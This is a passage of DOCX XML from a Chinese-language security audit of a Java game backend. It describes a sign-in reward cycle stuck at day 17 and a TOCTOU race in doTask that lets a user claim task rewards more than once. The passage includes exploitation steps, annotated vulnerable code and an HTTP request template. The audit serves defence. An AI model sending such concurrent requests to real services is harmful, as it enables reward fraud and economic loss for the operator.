          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="988"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用目标用户账号，每日调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/signIn/do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 直至历史签到记录达到 101 条（约需 101 个自然日）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">此时数据库中该用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sign_in_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表已有 101 条记录；第102次发起签到请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="990"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createAndSaveSignInRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdOrderBySignInDateDesc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 受 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PageRequest.of(0, 100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 限制，仅返回最近100条，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>signedCount = 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="991"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nextDay = 100 % 28 + 1 = 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，系统查询第17天奖励配置并调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rewardApplyService.apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="992"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>正确行为应为：第102次签到 nextDay = 18，但实际始终发放第17天奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="993"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此后每日签到均重复步骤3～5，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nextDay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 永远不会超过17，奖励周期完全失效</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="994"/>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（需要有效 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="995"/>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普通登录用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无需任何特殊权限，任何积累了101+次签到的长期活跃用户均可触发</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996"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignInExecutionController.java.doSignIn → SignInExecutionService.java.doSignIn → SignInExecutionService.java.doSignInBusiness → SignInExecutionService.java.performSignInInsert → SignInExecutionService.java.createAndSaveSignInRecord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audit_m200_764_doSignIn_ctrl-path3of6.md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：TaskExecutionService.java#doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_47" w:id="47"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞46：doTask 检查后写入（TOCTOU）竞态条件 — 可重复创建任务绑定记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="997"/>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：doTask 先查后存 TOCTOU 竞态，导致同一用户重复绑定同一任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="998"/>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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="999"/>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业务逻辑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1000"/>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01"/>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1002"/>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doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注解，但底层数据库默认隔离级别为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>READ\_COMMITTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，在此隔离级别下，两个并发事务各自执行"先 SELECT 后 INSERT"操作时，彼此对对方未提交的写操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，因此同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对的去重检查完全无法阻止并发写入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>具体竞态窗口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1003"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">请求 A 执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 结果为空，进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在请求 A 尚未 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前，请求 B 同样执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 在 READ\_COMMITTED 下同样读到空，进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1005"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个请求均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecordRepository.save(r)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，成功向数据库插入两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">如果后续任务进度推进或奖励发放逻辑依据 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中的记录数或多条记录各自推进，则可被利用以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重复领取任务奖励</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，在游戏资产场景下直接造成经济损失。此外，提供的源码中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecordRepository</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仅通过 Spring Data 方法名推断查询，未见实体类 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Table(uniqueConstraints=...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或数据库唯一索引的约束定义，意味着数据库层面同样无法阻止并发重复写入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1006"/>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HTTP 请求携带 Bearer Token（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 解析 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）和 JSON body（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 用户完全可控）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskExecutionController.doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 透传至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskExecutionService.doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 在同一事务内执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（读） + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（写），两步操作之间无分布式锁、数据库行锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）或乐观锁保护，形成经典 TOCTOU。</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入口：TaskExecutionController.java</w:t>
              <w:br/>
              <w:t>// DoTaskForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long taskId;  ← 用户完全可控，无范围/存在性校验</w:t>
              <w:br/>
              <w:br/>
              <w:t>@PostMapping("/doTask")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; doTask(@CurrentUserId Long userId,   // ← userId 来自 Token，安全</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                @RequestBody DoTaskForm form) { // ← taskId 完全可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.doTask(userId, form.getTaskId());     // ← taskId 污点传入 Service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：TaskExecutionService.java</w:t>
              <w:br/>
              <w:t>@Transactional   // ← READ_COMMITTED 隔离级别，无法阻止并发重复写</w:t>
              <w:br/>
              <w:t>public void doTask(Long userId, Long taskId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserTaskRecord&gt; byUserIdAndTaskId =</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId); // ← T1：检查（读）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!byUserIdAndTaskId.isEmpty()) return;                           // ← 并发时两个请求均通过此处</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserTaskRecord r = new UserTaskRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTaskId(taskId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setCurrentProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTargetProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setStatus(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecordRepository.save(r); // ← T2：写入；并发请求均执行此处，导致重复记录</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&gt; 本漏洞属于并发设计缺陷，需同时发起两个或以上并发请求：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/api/task/doTask HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>&lt;签名头（符合 SignAuthTestFilter 要求）&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"taskId": &lt;攻击者选定的目标taskId&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
